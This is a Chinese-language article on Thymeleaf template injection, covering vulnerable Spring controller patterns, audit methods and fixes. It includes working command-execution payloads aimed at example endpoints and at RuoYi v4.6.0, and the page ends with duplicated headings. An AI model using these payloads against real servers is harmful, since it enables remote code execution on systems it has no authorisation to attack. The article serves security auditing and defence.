Thymeleaf模板注入漏洞分析与防御指南<\/h1>

一、漏洞概述<\/h2>
Thymeleaf是一种流行的Java模板引擎，在3.0.0-3.0.11版本中存在模板注入漏洞。虽然3.0.12-3.0.15版本进行了修复，但仍存在绕过可能。<\/p>

漏洞条件<\/h3>

返回的视图名称或视图内容部分可控<\/li>

返回内容未被以下方式处理：

@RestController<\/code>或@ResponseBody<\/code>注解修饰<\/li>
使用HttpServletResponse<\/code>直接输出<\/li>
使用redirect<\/code>重定向<\/li>
使用forward<\/code>转发<\/li> <\/ul> <\/li>

当返回类型为void<\/code>时，Spring Boot会从URL中获取视图名，若路径可控也存在风险<\/li>
<\/ol>
二、环境搭建<\/h2>
依赖配置<\/h3>
Spring Boot与Thymeleaf集成良好，通过spring-boot-starter-thymeleaf<\/code>引入对应版本。例如：<\/p>

Spring Boot 2.2.0.RELEASE → Thymeleaf 3.0.11.RELEASE<\/li>
<\/ul>
示例Controller<\/h3>
@Controller<\/span>
<\/span><\/span>public<\/span> class<\/span> ExampleController<\/span> {<\/span>
<\/span><\/span>    @GetMapping<\/span>(<\/span>"\/lang"<\/span>)<\/span>
<\/span><\/span>    public<\/span> String lang<\/span>(<\/span>@RequestParam<\/span> String rtype)<\/span> {<\/span>
<\/span><\/span>        return<\/span> "index-"<\/span> +<\/span> rtype;<\/span> \/\/ 视图名拼接用户输入
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>三、漏洞审计方法<\/h2>
1. 审计方法<\/h3>

逐个Controller检查<\/strong>：耗时但全面<\/li>
全局搜索<\/strong>：搜索"::"<\/code>（两个引号）等关键模式<\/li>
<\/ul>
2. 常见漏洞模式<\/h3>


模式1<\/strong>：直接拼接用户输入作为视图名<\/p>
return<\/span> "view-"<\/span> +<\/span> userInput;<\/span>
<\/span><\/span><\/code><\/pre><\/li>

模式2<\/strong>：返回类型为void，从URL获取视图名<\/p>
@GetMapping<\/span>(<\/span>"\/path\/{path}"<\/span>)<\/span>
<\/span><\/span>public<\/span> void<\/span> handlePath<\/span>(<\/span>@PathVariable<\/span> String path)<\/span> {<\/span>
<\/span><\/span>    \/\/ 无返回，视图名取自URL路径
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
3. 类型转换问题<\/h3>
当参数类型为基本类型（如int）时，模板会进行类型转换，可能导致错误：<\/p>
@GetMapping<\/span>(<\/span>"\/lang3"<\/span>)<\/span>
<\/span><\/span>public<\/span> String lang3<\/span>(<\/span>@RequestParam<\/span> int<\/span> rtype)<\/span> {<\/span>
<\/span><\/span>    return<\/span> "index-"<\/span> +<\/span> rtype;<\/span> \/\/ 类型转换可能导致问题
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>四、漏洞利用<\/h2>
1. 基本利用<\/h3>
对于视图名拼接的接口：<\/p>
\/lang1?rtype=__${T(java.lang.Runtime).getRuntime().exec("calc")}__::.x
<\/code><\/pre>
注意需要对特殊字符进行URL编码。<\/p>
2. 无返回接口利用<\/h3>
对于返回类型为void的接口：<\/p>
\/path\/__${T(java.lang.Runtime).getRuntime().exec("calc")}__::.x
<\/code><\/pre>
五、实战案例（以若依v4.6.0为例）<\/h2>
1. 版本确认<\/h3>

通过External Libraries<\/code>查看Thymeleaf版本<\/li>
或在spring-boot-dependencies-2.2.12.RELEASE.pom<\/code>中查找<\/li>
<\/ul>
2. 漏洞定位<\/h3>
全局搜索"::"<\/code>模式，发现多处潜在漏洞点，如：<\/p>
@GetMapping<\/span>(<\/span>"\/example"<\/span>)<\/span>
<\/span><\/span>public<\/span> String example<\/span>(<\/span>@RequestParam<\/span> String fragment,<\/span> 
<\/span><\/span>                     @RequestParam<\/span> String taskName,<\/span>
<\/span><\/span>                     Map<<\/span>String,<\/span> Object><\/span> mmap)<\/span> {<\/span>
<\/span><\/span>    mmap.<\/span>put<\/span>(<\/span>"fragment"<\/span>,<\/span> fragment);<\/span>
<\/span><\/span>    return<\/span> "example\/"<\/span> +<\/span> taskName;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 漏洞验证<\/h3>
构造恶意请求：<\/p>
\/example?taskName=__${T(java.lang.Runtime).getRuntime().exec("calc")}__::.x&fragment=test
<\/code><\/pre>
六、防御措施<\/h2>

升级Thymeleaf<\/strong>：使用3.0.12及以上版本<\/li>
输入验证<\/strong>：对用户输入进行严格过滤<\/li>
避免直接拼接<\/strong>：不要将用户输入直接拼接到视图名中<\/li>
使用安全注解<\/strong>：对不需要模板渲染的接口使用@ResponseBody<\/code><\/li>
白名单验证<\/strong>：对视图名进行白名单校验<\/li>
<\/ol>
七、总结<\/h2>
Thymeleaf模板注入漏洞主要源于视图名的不可控拼接，特别是在特定版本中更为严重。开发人员应避免直接将用户输入用于视图解析，并保持框架版本更新。审计时应重点关注视图名的生成逻辑和用户输入的传递路径。<\/p>
通过本文的分析，读者应能够理解Thymeleaf模板注入的原理、审计方法和防御策略，从而在实际开发和安全审计中有效识别和防范此类漏洞。<\/p>

Thymeleaf模板注入漏洞分析与防御指南<\/h1>

一、漏洞概述<\/h2> Thymeleaf是一种流行的Java模板引擎，在3.0.0-3.0.11版本中存在模板注入漏洞。虽然3.0.12-3.0.15版本进行了修复，但仍存在绕过可能。<\/p>

二、环境搭建<\/h2>

三、漏洞审计方法<\/h2>

四、漏洞利用<\/h2>

五、实战案例（以若依v4.6.0为例）<\/h2>

一、漏洞概述<\/h2>
Thymeleaf是一种流行的Java模板引擎，在3.0.0-3.0.11版本中存在模板注入漏洞。虽然3.0.12-3.0.15版本进行了修复，但仍存在绕过可能。<\/p>